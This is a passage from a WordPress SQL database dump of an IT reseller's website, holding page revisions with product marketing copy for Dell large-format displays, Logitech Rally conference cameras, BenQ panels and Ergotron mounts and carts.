08:20:24','',1505,'https://bintara.com.my/blog/2019/09/23/1505-autosave-v1/',0,'revision','',0),(3243,1,'2019-09-23 16:22:58','2019-09-23 08:22:58','Interactive Flat Panels (IFP), Monitors and Projectors.\n\n<a href=\"https://bintara.com.my/benq-rp704k-4k-uhd-70/\">RP704K 4K UHD 70â€™â€™</a>\n\n<a href=\"http://bintara.com.my/benq\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1817\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-51x.png\" alt=\"\" width=\"1024\" height=\"681\" />','BENQ','','inherit','closed','closed','','1349-autosave-v1','','','2019-09-23 16:22:58','2019-09-23 08:22:58','',1349,'https://bintara.com.my/blog/2019/09/23/1349-autosave-v1/',0,'revision','',0),(3245,1,'2019-09-24 08:38:21','2019-09-24 00:38:21','<p style=\"text-align: center; margin-top: -500px;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:38:21','2019-09-24 00:38:21','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(3246,1,'2019-09-24 08:38:41','2019-09-24 00:38:41','<p style=\"text-align: center; margin-top: -50px;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:38:41','2019-09-24 00:38:41','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(3247,1,'2019-09-24 08:40:11','2019-09-24 00:40:11','<p style=\"text-align: center; margin-top: -150px;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:40:11','2019-09-24 00:40:11','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(3248,1,'2019-09-24 08:40:35','2019-09-24 00:40:35','<p style=\"text-align: center; margin-top: -100px;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:40:35','2019-09-24 00:40:35','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(3249,1,'2019-09-24 08:53:30','2019-09-24 00:53:30','<p style=\"text-align: center; margin-top: -100px; font-size: 1.25rem;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-24 08:53:30','2019-09-24 00:53:30','',1287,'https://bintara.com.my/blog/2019/09/24/1287-revision-v1/',0,'revision','',0),(3665,1,'2019-10-25 15:58:40','2019-10-25 07:58:40','Dell','Dell','Dell','inherit','closed','closed','','dell-png-2','','','2019-10-25 15:58:56','2019-10-25 07:58:56','',3654,'https://bintara.com.my/wp-content/uploads/2019/10/Dell-PNG-1.png',0,'attachment','image/png',0),(3669,1,'2019-10-25 16:32:01','2019-10-25 08:32:01','Dell Large Format Displays <a href=\"https://bintara.com.my/dell/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2019/10/Dell-PNG-1.png\" alt=\"\" width=\"1024\" height=\"681\" />','Dell','','publish','closed','closed','','dell','','','2019-10-25 16:45:58','2019-10-25 08:45:58','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=3669',0,'portfolio','',0),(3670,1,'2019-10-25 16:38:55','2019-10-25 08:38:55','ArCADia BIM, ArCADia-RAMA, INTERsoft-INTELLICAD <a href=\"https://bintara.com.my/dell/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2019/09/Artboard-12x.png\" alt=\"\" width=\"1024\" height=\"681\" />','Dell','','inherit','closed','closed','','3669-autosave-v1','','','2019-10-25 16:38:55','2019-10-25 08:38:55','',3669,'https://bintara.com.my/blog/2019/10/25/3669-autosave-v1/',0,'revision','',0),(3667,1,'2019-10-25 16:29:37','2019-10-25 08:29:37','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand<a rel=\"technotes:monitor-tracker\">*</a>, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>','Dell','','inherit','closed','closed','','3661-revision-v1','','','2019-10-25 16:29:37','2019-10-25 08:29:37','',3661,'https://bintara.com.my/blog/2019/10/25/3661-revision-v1/',0,'revision','',0),(3654,1,'2019-10-25 15:27:33','2019-10-25 07:27:33','Dell Large Format Displays <a href=\"#\">Read More...</a>\r\n\r\n<!--more-->','Dell','','trash','closed','closed','','dell__trashed','','','2019-10-25 16:31:21','2019-10-25 08:31:21','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=3654',0,'portfolio','',0),(3655,1,'2019-10-25 15:36:53','2019-10-25 07:36:53','','Dell','','trash','closed','closed','','__trashed','','','2019-10-25 15:36:53','2019-10-25 07:36:53','',0,'https://bintara.com.my/?page_id=3655',0,'page','',0),(3251,1,'2019-09-24 09:55:11','2019-09-24 01:55:11','<!-- wp:paragraph -->\r\n<p>Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p>â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p>â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p>Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p>\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.</p>\r\n\r\n<p>\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n<br />\r\n\r\n<p>The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/Â </p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 09:55:11','2019-09-24 01:55:11','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3663,1,'2019-10-25 15:44:51','2019-10-25 07:44:51','','Dell','','inherit','closed','closed','','3661-revision-v1','','','2019-10-25 15:44:51','2019-10-25 07:44:51','',3661,'https://bintara.com.my/blog/2019/10/25/3661-revision-v1/',0,'revision','',0),(3664,1,'2019-10-25 15:49:26','2019-10-25 07:49:26','Dell','Dell','Dell','inherit','closed','closed','','dell-png','','','2019-10-25 15:49:47','2019-10-25 07:49:47','',3654,'https://bintara.com.my/wp-content/uploads/2019/10/Dell-PNG.png',0,'attachment','image/png',0),(3660,1,'2019-10-25 15:36:53','2019-10-25 07:36:53','','Dell','','inherit','closed','closed','','3656-revision-v1','','','2019-10-25 15:36:53','2019-10-25 07:36:53','',3656,'https://bintara.com.my/blog/2019/10/25/3656-revision-v1/',0,'revision','',0),(3661,1,'2019-10-25 15:44:51','2019-10-25 07:44:51','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>		\n		<h2>Captivate your audience</h2><ul><li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li></ul><ul><li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and vivid visuals.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" /></p>		\n			<h2>Dell Large Format Monitors</h2>		\n		https://www.youtube.com/watch?v=Z98yJnbXWq8		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" /></p><h2>Adapts to business needs. Present and future.</h2><ul><li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li></ul><ul><li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li></ul>		\n		<h2>Easy to deploy. Simple to manage.</h2><ul><li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li><li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" /></p><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" /></p><h2>Ultimate management</h2><ul><li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li><li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li></ul>		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" /></p><h2>Dependable reliability</h2><strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.<br /><br /><strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.		\n		<h2 style=\"text-align: center;\">C5519Q</h2><h2 style=\"text-align: center;\">C5518QT</h2><h2 style=\"text-align: center;\">C7017T</h2><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c5519q/global_spi/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\" alt=\"C5519Q Monitor\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c5518qt/pdp/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\" alt=\"Dell Monitor C5518QT\" /></p><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7017t/global_spi/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\" alt=\"Dell 70 (C7017t) Conference Room Monitor\" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />Optional bracket<br />Non-touch<br />54.6 in<br />Vertical Alignment Glass<br />Anti-glare<br />Optional wall mount<br />2x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />54.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>Full HD<br />Optional bracket<br />10 points of touch<br />69.5 in<br />Vertical Alignment Glass<br />Anti-glare, Anti-smudge<br />Wall mount included<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p>Wall mount included</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><h2 style=\"text-align: center;\">C7520QT</h2><h2 style=\"text-align: center;\">C8618QT</h2><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7520qt/global_spi/ng/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\" alt=\"Dell 75 4K Interactive Touch Monitor: C7520QT\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c8618qt/global_spi/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\" alt=\"Dell-C8618QT-Monitor \" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />PC slot<br />20 points of touch<br />75 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />85.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />4x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p>','Dell Large Format Displays','','publish','closed','closed','','dell','','','2019-10-29 10:20:50','2019-10-29 02:20:50','',0,'https://bintara.com.my/?page_id=3661',0,'page','',0),(3656,1,'2019-10-25 15:36:53','2019-10-25 07:36:53','','Dell','','trash','closed','closed','','__trashed-2','','','2019-10-25 15:36:53','2019-10-25 07:36:53','',0,'https://bintara.com.my/?page_id=3656',0,'page','',0),(3515,1,'2019-09-26 15:14:15','2019-09-26 07:14:15','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:14:15','2019-09-26 07:14:15','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3259,1,'2019-09-24 10:27:23','2019-09-24 02:27:23','<!-- wp:paragraph -->\r\n<p align=\"justify\">Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p align=\"justify\">â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a 